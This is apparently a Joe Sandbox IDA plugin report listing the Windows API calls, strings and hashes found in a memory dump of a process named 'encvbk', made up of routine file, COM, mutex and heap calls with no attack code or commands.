                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Local$AllocByteCharFreeMultiWide_wtoi
                                                                                          • String ID:
                                                                                          • API String ID: 3528786098-0
                                                                                          • Opcode ID: e9be804da0a89780e048e13226dacaa1a0be85e656f267a536016758f05ff73f
                                                                                          • Instruction ID: ef16e82347842a14583fc87a91b81f59f4f2475563c33f5412b6a31ffd3781ee
                                                                                          • Opcode Fuzzy Hash: e9be804da0a89780e048e13226dacaa1a0be85e656f267a536016758f05ff73f
                                                                                          • Instruction Fuzzy Hash: AE31BF75501212AFCB215B64DC589BBBFB9EF89710718416AFD05C3390D7B19E02CAB1
                                                                                          APIs
                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00DD3A7B
                                                                                          • memset.MSVCRT ref: 00DD3A8F
                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00DD3AA6
                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00DD3AC1
                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00DD3AE1
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DD3AF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Read$CloseCreateHandlePointermemset
                                                                                          • String ID:
                                                                                          • API String ID: 3827546496-0
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00DD6762
                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD6771
                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD677A
                                                                                          • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00DD6783
                                                                                          • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00DD6798
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                          • String ID:
                                                                                          • API String ID: 1445889803-0
                                                                                          APIs
                                                                                          • CharNextW.API-MS-WIN-CORE-STRING-L2-1-0(?,00000000,?,00000000,?), ref: 00DD5885
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharNext
                                                                                          • String ID: /$localserver$sta
                                                                                          • API String ID: 3213498283-3694077230
                                                                                          APIs
                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00DD24EB
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00DD24F7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                          • API String ID: 1646373207-919018592
                                                                                          APIs
                                                                                          • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3381
                                                                                          • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD339A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExclusiveLock$AcquireRelease
                                                                                          • String ID:
                                                                                          • API String ID: 17069307-0
                                                                                          APIs
                                                                                          • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006), ref: 00DD4003
                                                                                          • CLSIDFromString.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00DD4012
                                                                                          • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,00000000,00000001,00DD1970,?,?,?), ref: 00DD402D
                                                                                          • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00DD405E
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromInitializeInstanceStringUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2575628211-0
                                                                                          APIs
                                                                                            • Part of subcall function 00DD6598: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00DD659F
                                                                                          • __set_app_type.MSVCRT ref: 00DD5E92
                                                                                          • __p__fmode.MSVCRT ref: 00DD5EA8
                                                                                          • __p__commode.MSVCRT ref: 00DD5EB6
                                                                                          • __setusermatherr.MSVCRT ref: 00DD5ED7
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                          • String ID:
                                                                                          • API String ID: 1632413811-0
                                                                                          APIs
                                                                                          • RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80040111,?), ref: 00DD55D9
                                                                                            • Part of subcall function 00DD33F9: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3431
                                                                                            • Part of subcall function 00DD33F9: DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00DD3443
                                                                                            • Part of subcall function 00DD33F9: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD346A
                                                                                          • RoOriginateErrorW.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80070057,00000012,?), ref: 00DD5616
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLockOriginateShared$AcquireDecodePointerRelease
                                                                                          • String ID: activatibleClassId
                                                                                          • API String ID: 3068322146-2691401494
                                                                                          APIs
                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040,?,00000000,00000000), ref: 00DD4771
                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 00DD47A5
                                                                                            • Part of subcall function 00DD46CA: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,00DD2B21,00000000,?,?), ref: 00DD46DA
                                                                                            • Part of subcall function 00DD46CA: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,00DD2B21,00000000,?,?), ref: 00DD46E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                          • String ID: Local\SM0:%d:%d:%hs
                                                                                          • API String ID: 779401067-4162240545
                                                                                          APIs
                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00DD2CC6
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00DD2CD2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOpenSemaphore
                                                                                          • String ID: _p0
                                                                                          • API String ID: 1909229842-2437413317
                                                                                          APIs
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00DD4925
                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00DD4936
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00DD495D
                                                                                          • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00DD4964
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1234203156-0
                                                                                          APIs
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00DD4925
                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00DD4936
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00DD495D
                                                                                          • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00DD4964
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1234203156-0
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,?,00DD4B2F,?,00000000,00000000,?,?,?,00000000,?), ref: 00DD2E80
                                                                                          • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00DD48A0,?,?,?,?,00000000), ref: 00DD2E87
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00DD4B2F,?,00000000,00000000,?,?,?,00000000,?,?,?,00DD48A0), ref: 00DD2EA5
                                                                                          • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00DD48A0,?,?,?,?,00000000), ref: 00DD2EAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3859560861-0
                                                                                          • Opcode ID: 64cd35d1fc3a0ab4fdab4671d7409c4ef03fcaca2dbb859d25da4489e4cac0b3
                                                                                          • Instruction ID: 0f7afe1983fd6e57a9c4d1e280c6efab0ebb5262662890106e5ff3007645e22d
                                                                                          • Opcode Fuzzy Hash: 64cd35d1fc3a0ab4fdab4671d7409c4ef03fcaca2dbb859d25da4489e4cac0b3
                                                                                          • Instruction Fuzzy Hash: 14F03C72210211AFDB249FA1E888B65BBF8FF58312F11052AF141C6250D775A995CBB0